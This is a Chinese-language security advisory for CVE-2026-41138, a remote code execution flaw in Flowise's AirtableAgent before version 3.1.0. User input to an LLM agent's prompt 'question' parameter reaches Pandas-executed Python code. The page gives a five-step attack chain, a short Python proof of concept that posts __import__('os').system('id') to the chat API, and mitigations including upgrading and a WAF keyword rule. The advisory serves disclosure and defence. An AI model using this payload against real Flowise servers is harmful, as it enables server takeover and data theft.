CVE-2026-41138 CVSS 8.8 高危

CVE-2026-41138 Flowise远程代码执行漏洞

披露日期: 2026-04-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41138

漏洞类型

远程代码执行

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Flowise

漏洞概述

Flowise 是一个用于构建定制化大语言模型流程的拖放式用户界面。在 3.1.0 版本之前，AirtableAgent.ts 组件存在远程代码执行漏洞。该漏洞由于使用 Pandas 时缺乏输入验证导致，用户输入被直接应用到 prompt 模板的 question 参数中并反射到 Python 代码，未经任何净化。攻击者可利用此漏洞执行任意代码。

技术细节

该漏洞位于 Flowise 的 AirtableAgent.ts 文件中，涉及 Pandas 库的集成使用。当系统处理用户请求时，会将用户提供的输入直接传递给 prompt 模板中的 question 参数。由于系统未对输入数据进行充分的清洗和验证，且该参数随后被直接反射到后端执行的 Python 代码环境中，攻击者可以构造恶意的 Payload。这种注入攻击允许攻击者在服务器上下文中执行任意 Python 命令。由于攻击向量为网络（AV:N），且不需要用户交互（UI:N），仅需低权限（PR:L）即可触发，这使得攻击者能够轻易地控制受影响的服务器，造成数据泄露、篡改或服务中断等严重后果。

攻击链分析

STEP 1

信息收集

攻击者识别出目标系统正在运行 Flowise 且版本低于 3.1.0。

STEP 2

漏洞探测

攻击者以低权限用户身份访问系统，定位到 AirtableAgent 接口。

STEP 3

Payload 构造

攻击者构造包含恶意 Python 代码的特殊字符串，准备注入到 question 参数中。

STEP 4

漏洞利用

发送包含恶意 Payload 的请求至服务器，后端 Pandas 处理该输入并执行恶意代码。

STEP 5

获取权限

成功在服务器端执行任意代码，获得服务器控制权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-41138
# This script demonstrates the injection into the 'question' parameter
# leading to Remote Code Execution via Pandas reflection.

import requests

target_url = "http://vulnerable-flowise-instance/api/v1/chat/message"

# Malicious payload to execute Python code
payload = """
__import__('os').system('id')
"""

headers = {
    "Content-Type": "application/json"
}

data = {
    "question": payload,
    "overrideConfig": {}
}

response = requests.post(target_url, json=data, headers=headers)
print(f"Status Code: {response.status_code}")
print(f"Response: {response.text}")

影响范围

Flowise < 3.1.0

防御指南

临时缓解措施

建议立即将 Flowise 升级到 3.1.0 版本。若无法立即升级，应暂时禁用 AirtableAgent 功能，或通过 WAF 拦截包含特定 Python 关键字（如 __import__, os.system）的请求，并限制对 API 接口的网络访问。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表